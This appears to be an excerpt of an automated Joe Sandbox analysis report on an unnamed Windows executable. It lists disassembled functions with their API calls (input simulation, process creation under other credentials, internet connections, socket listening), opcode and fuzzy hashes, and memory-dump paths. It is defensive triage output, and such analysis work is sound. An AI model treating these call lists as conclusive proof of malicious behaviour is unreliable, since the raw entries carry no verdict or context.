                                                                                                                                                        • Opcode ID: 337e55e46259a5a0ffabe32f9c531069c0685e3b669512a2fdfdf7d2dd734a1c
                                                                                                                                                        • Instruction ID: 7bca46abd75a4807caf6d2a793440f72cfc06a56d79b34cbed93887cd56d0803
                                                                                                                                                        • Opcode Fuzzy Hash: 337e55e46259a5a0ffabe32f9c531069c0685e3b669512a2fdfdf7d2dd734a1c
                                                                                                                                                        • Instruction Fuzzy Hash: 1AD0A974444322AFD7209F32E849B8237E8AF04304BA0C46AF896E2370DFB0D8808A10
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00AD1371,?,00AD1519), ref: 00AD13B4
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00AD13C6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                        • API String ID: 2574300362-1587604923
                                                                                                                                                        • Opcode ID: a8b585cb4dd01a5574feeac863a956c9e6905c79cc48998850a4d7d5e6995deb
                                                                                                                                                        • Instruction ID: 9c81a4f32d2f26a46b6fa40d365a30605e5d440f87de3d6036e7b510b3c4f7fc
                                                                                                                                                        • Opcode Fuzzy Hash: a8b585cb4dd01a5574feeac863a956c9e6905c79cc48998850a4d7d5e6995deb
                                                                                                                                                        • Instruction Fuzzy Hash: C3D0A930800322BFD7254F24E80878237E9AB40704F40846AE496E2778DEB0C880AB10
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,00AD135F,?,00AD1440), ref: 00AD1389
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00AD139B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                        • API String ID: 2574300362-1071820185
                                                                                                                                                        • Opcode ID: c659f067667e00944c5c0614235454ff3d78f5f5ffe1e3ab37a5aa58cbe81413
                                                                                                                                                        • Instruction ID: 04ebe441c479b87d4572fc123cf3ef61965009cfeab51ce0cd030cc34b11884e
                                                                                                                                                        • Opcode Fuzzy Hash: c659f067667e00944c5c0614235454ff3d78f5f5ffe1e3ab37a5aa58cbe81413
                                                                                                                                                        • Instruction Fuzzy Hash: C8D0A730800322BFD7300F24E80878137D4AF04704F08845AE486E2760DA70CA809710
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00AF3AC2,?,00AF29F5), ref: 00AF3ADA
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AF3AEC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                        • API String ID: 2574300362-4033151799
                                                                                                                                                        • Opcode ID: bee2754c11f49b8d0100ce4f3987edadb93fb4ad664df3c1baa0e36f0443599f
                                                                                                                                                        • Instruction ID: aeaa31b79e7753ded9f02b073be5af47c610360657d3d14fc2ad24a570518a2c
                                                                                                                                                        • Opcode Fuzzy Hash: bee2754c11f49b8d0100ce4f3987edadb93fb4ad664df3c1baa0e36f0443599f
                                                                                                                                                        • Instruction Fuzzy Hash: 59D0A931441323AFDB20AFB2E80E79637E8AB11304B0084A9F9D5E2260EFF0C9908A10
                                                                                                                                                        APIs
                                                                                                                                                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00AE6AA6), ref: 00A9AB2D
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00A9AB49
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharUpper_wcscmp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 820872866-0
                                                                                                                                                        • Opcode ID: d65307ebf491e44b543f452a8b652d9d66e75ce729cec41c26e0a76313e2b8ce
                                                                                                                                                        • Instruction ID: a487ea214d0bb0ccef3b684f1b4cbca6fbe32a5ab9fe838f5116b48215eec9b1
                                                                                                                                                        • Opcode Fuzzy Hash: d65307ebf491e44b543f452a8b652d9d66e75ce729cec41c26e0a76313e2b8ce
                                                                                                                                                        • Instruction Fuzzy Hash: DBA1F27570010A9BDF14DF65EA816AEBBF1FF58300F6485AAEC5687290EB309C70D782
                                                                                                                                                        APIs
                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00AF0D85
                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00AF0DC8
                                                                                                                                                          • Part of subcall function 00AF0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00AF0478
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00AF0FB2
                                                                                                                                                        • _memmove.LIBCMT ref: 00AF0FC2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3659485706-0
                                                                                                                                                        • Opcode ID: 899d1a3d708445196c4ac636ff4f1379941b19b4d5f3002c3f06b17884867b09
                                                                                                                                                        • Instruction ID: 232d69335450256a60055e67dd948332124639f6399325b29723ca76df1a327c
                                                                                                                                                        • Opcode Fuzzy Hash: 899d1a3d708445196c4ac636ff4f1379941b19b4d5f3002c3f06b17884867b09
                                                                                                                                                        • Instruction Fuzzy Hash: 72B19B716043048FCB14DF68C98096ABBE4EF89754F14886EF98ADB352DB31ED46CB91
                                                                                                                                                        APIs
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00AEAF56
                                                                                                                                                        • CoUninitialize.COMBASE ref: 00AEAF61
                                                                                                                                                          • Part of subcall function 00AD1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00AD10B8
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00AEAF6C
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00AEB23F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 780911581-0
                                                                                                                                                        • Opcode ID: 60673f818dcf99e790023e5621ffe60505912ecb3030edf8f9003c010af2127a
                                                                                                                                                        • Instruction ID: 24970170b7df5165ba4a19ea64036902233bef72e852da57606d73483d30004b
                                                                                                                                                        • Opcode Fuzzy Hash: 60673f818dcf99e790023e5621ffe60505912ecb3030edf8f9003c010af2127a
                                                                                                                                                        • Instruction Fuzzy Hash: 5AA189356047429FCB10DF19C995B5AB7E4BF89320F048559FA9AAB3A1CB30FD40CB92
                                                                                                                                                        APIs
                                                                                                                                                        • _memmove.LIBCMT ref: 00A9C419
                                                                                                                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00AD6653,?,?,00000000), ref: 00A9C495
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1325644223-0
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3877424927-0
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00AFC354
                                                                                                                                                        • ScreenToClient.USER32(?,00000002), ref: 00AFC384
                                                                                                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00AFC3EA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3880355969-0
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00ACD258
                                                                                                                                                        • __itow.LIBCMT ref: 00ACD292
                                                                                                                                                          • Part of subcall function 00ACD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00ACD549
                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00ACD2FB
                                                                                                                                                        • __itow.LIBCMT ref: 00ACD350
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$__itow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3379773720-0
                                                                                                                                                        APIs
                                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00ADEF32
                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00ADEF58
                                                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00ADEF7D
                                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00ADEFA9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3321077145-0
                                                                                                                                                        APIs
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AFB3E1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InvalidateRect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 634782764-0
                                                                                                                                                        • Opcode ID: 9269085d8487e5ca975537202cf0bd36e4c77b5181c5d30934b350f487aba365
                                                                                                                                                        • Instruction ID: f57dbd6ccfc479fe6d048084e56f21f4eee67c919b4fba707cd757bbe91f5c01
                                                                                                                                                        • Opcode Fuzzy Hash: 9269085d8487e5ca975537202cf0bd36e4c77b5181c5d30934b350f487aba365
                                                                                                                                                        • Instruction Fuzzy Hash: 5831903466020CABEF249F98CE85BB87775AB05352F648612FB51DB5E2C730E9409B71
                                                                                                                                                        APIs
                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00AFD617
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00AFD68D
                                                                                                                                                        • PtInRect.USER32(?,?,00AFEB2C), ref: 00AFD69D
                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00AFD70E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                                        • Opcode ID: 84fe680841f93bee930f589ad6f90acdda8edda2f4b599ecc22c12ded9a7d314
                                                                                                                                                        • Instruction ID: 7e109cf059f56e222e21493904a3c5d33ee9bca520383e562849b767abdfa96b
                                                                                                                                                        • Opcode Fuzzy Hash: 84fe680841f93bee930f589ad6f90acdda8edda2f4b599ecc22c12ded9a7d314
                                                                                                                                                        • Instruction Fuzzy Hash: F4415A30A10218DFCB52DF98D884BA9BBF6BB45305F1481AAF609DF251D730E841CB50
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 00AD44EE
                                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00AD450A
                                                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00AD456A
                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 00AD45C8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                        • Opcode ID: 1dbc3a2d0ae0c2398dbe26657bae726b14c2cbcfabb9f9f937d341f698699632
                                                                                                                                                        • Instruction ID: dcbb9ec5aa6981d8c5b64920495dc73b264e2d6fd44b8b294b4910edbc54191f
                                                                                                                                                        • Opcode Fuzzy Hash: 1dbc3a2d0ae0c2398dbe26657bae726b14c2cbcfabb9f9f937d341f698699632
                                                                                                                                                        • Instruction Fuzzy Hash: 9A31E2B1A04298AFEF208B64A9087FE7BB69B5D314F04025BF483933C1CB749E44D762
                                                                                                                                                        APIs
                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AC4DE8
                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00AC4E16
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00AC4E44
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00AC4E7A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                        • Opcode ID: e7149f95d94175e0ea4993f3516c433070e9e42041a6af2d9a4066ff2a6e6a2a
                                                                                                                                                        • Instruction ID: d4ceebad42b0ab1f6d5936799ddcedec978f8fb25dc862a43ec1371e8dbb258d
                                                                                                                                                        • Opcode Fuzzy Hash: e7149f95d94175e0ea4993f3516c433070e9e42041a6af2d9a4066ff2a6e6a2a
                                                                                                                                                        • Instruction Fuzzy Hash: 7631BE31600206AFDF229F74C855FEA7BAAFF49320F17852DE8218B1A1E730D850DB94
                                                                                                                                                        APIs
                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00AF7AB6
                                                                                                                                                          • Part of subcall function 00AD69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AD69E3
                                                                                                                                                          • Part of subcall function 00AD69C9: GetCurrentThreadId.KERNEL32 ref: 00AD69EA
                                                                                                                                                          • Part of subcall function 00AD69C9: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00AD69F1
                                                                                                                                                        • GetCaretPos.USER32(?), ref: 00AF7AC7
                                                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00AF7B00
                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00AF7B06
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2759813231-0
                                                                                                                                                        • Opcode ID: 075dad0e6034e201b88a4085854f5c2544c1d1ec6d3853a95191dca83af3eaab
                                                                                                                                                        • Instruction ID: 5b918819135cd635898520ee85cca2bbd798cd533f96c5157b4b9d4b59e710d2
                                                                                                                                                        • Opcode Fuzzy Hash: 075dad0e6034e201b88a4085854f5c2544c1d1ec6d3853a95191dca83af3eaab
                                                                                                                                                        • Instruction Fuzzy Hash: F7311071D00108AFCB00EFB9D9859EFBBF9EF55310B11846AE415E7251DB359E058BA0
                                                                                                                                                        APIs
                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AE49B7
                                                                                                                                                          • Part of subcall function 00AE4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AE4A60
                                                                                                                                                          • Part of subcall function 00AE4A41: InternetCloseHandle.WININET(00000000), ref: 00AE4AFD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1463438336-0
                                                                                                                                                        • Opcode ID: 6e7fc32f9726c4047e05b698b264d6267f1eed2932a7802fd02abf6fd4484bae
                                                                                                                                                        • Instruction ID: 19d6824dde8c9a8686f8dc90856dc32f7c37422a17e4aac602502dcf6238f90c
                                                                                                                                                        • Opcode Fuzzy Hash: 6e7fc32f9726c4047e05b698b264d6267f1eed2932a7802fd02abf6fd4484bae
                                                                                                                                                        • Instruction Fuzzy Hash: 8C21A431640A45BFDB129F629C00FBBBBBDFB48711F14402AFA0597551EB71D811A794
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00ACBCD9
                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00ACBCE0
                                                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00ACBCFA
                                                                                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ACBD29
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2621361867-0
                                                                                                                                                        • Opcode ID: 4e103f1a154861e40ce2581a0433789a7fc1cbe8f21ad78f8fba315a8aef17be
                                                                                                                                                        • Instruction ID: 5e2a2cba3ab374beb9f19054727aed479d006214aefc72cd74276710e1491a94
                                                                                                                                                        • Opcode Fuzzy Hash: 4e103f1a154861e40ce2581a0433789a7fc1cbe8f21ad78f8fba315a8aef17be
                                                                                                                                                        • Instruction Fuzzy Hash: 8D214F72115209BBDF029F98ED4AFDE7BA9EF08315F058019FA01A6160CB76DE61DB60
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00AF88A3
                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AF88BD
                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AF88CB
                                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00AF88D9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2169480361-0
                                                                                                                                                        • Opcode ID: f1c6c59f0ba910a89bc17413aceb1f8b00ea013b1f37e305cbb18e88b36bf672
                                                                                                                                                        • Instruction ID: fa9c12fb4ccfa4e3f6744cd8e67c3407b16f225f6580e2496927dd5a92aa4287
                                                                                                                                                        • Opcode Fuzzy Hash: f1c6c59f0ba910a89bc17413aceb1f8b00ea013b1f37e305cbb18e88b36bf672
                                                                                                                                                        • Instruction Fuzzy Hash: 06118E32305515AFDB14AB68CD05FBA7BE9EF853A0F548119F916C72E2CB78AD00CB94
                                                                                                                                                        APIs
                                                                                                                                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00AE906D
                                                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00AE907F
                                                                                                                                                        • accept.WS2_32(00000000,00000000,00000000), ref: 00AE908C
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE90A3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastacceptselect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 385091864-0
                                                                                                                                                        • Opcode ID: 31ca8db01dbccc2203fae2724c9efec9f248a3f49426d7dab71045975fd51ac9
                                                                                                                                                        • Instruction ID: 2f11a629b02f5a6ce561cdf1016dcb283f13c6edf11789710a6fa50f723e64de
                                                                                                                                                        • Opcode Fuzzy Hash: 31ca8db01dbccc2203fae2724c9efec9f248a3f49426d7dab71045975fd51ac9
                                                                                                                                                        • Instruction Fuzzy Hash: 3C215475A001249FCB10DF69C985ADABBFCEF49710F40816AF849D7291DB749E41CB90
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AD2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00AD18FD,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?), ref: 00AD2CB9
                                                                                                                                                          • Part of subcall function 00AD2CAA: lstrcpyW.KERNEL32(00000000,?,?,00AD18FD,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD2CDF
                                                                                                                                                          • Part of subcall function 00AD2CAA: lstrcmpiW.KERNEL32(00000000,?,00AD18FD,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?), ref: 00AD2D10
                                                                                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD1916
                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD193C
                                                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD1970
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                        • String ID: cdecl
                                                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                                                        • Opcode ID: 23f85e603ca50946ac197c1a26c373754901b24f020893e1bcbb7a2a507c910b
                                                                                                                                                        • Instruction ID: d90f88ccdb2eec68ced1e565229e91f3a3e114704b7caf384eda7d52697edfef
                                                                                                                                                        • Opcode Fuzzy Hash: 23f85e603ca50946ac197c1a26c373754901b24f020893e1bcbb7a2a507c910b
                                                                                                                                                        • Instruction Fuzzy Hash: E611BB3A200301BFDB15AF74D865EBA77B8FF44350B80902AF807CB2A0EB319951C7A1
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AD715C
                                                                                                                                                        • _memset.LIBCMT ref: 00AD717D
                                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00AD71CF
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AD71D8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1157408455-0
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00AD13EE
                                                                                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00AD1409
                                                                                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00AD141F
                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00AD1474
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3137044355-0
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00ACC285
                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ACC297
                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ACC2AD
                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ACC2C8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00AD7C6C
                                                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00AD7C9F
                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AD7CB5
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AD7CBC
                                                                                                                                                        Memory Dump Source
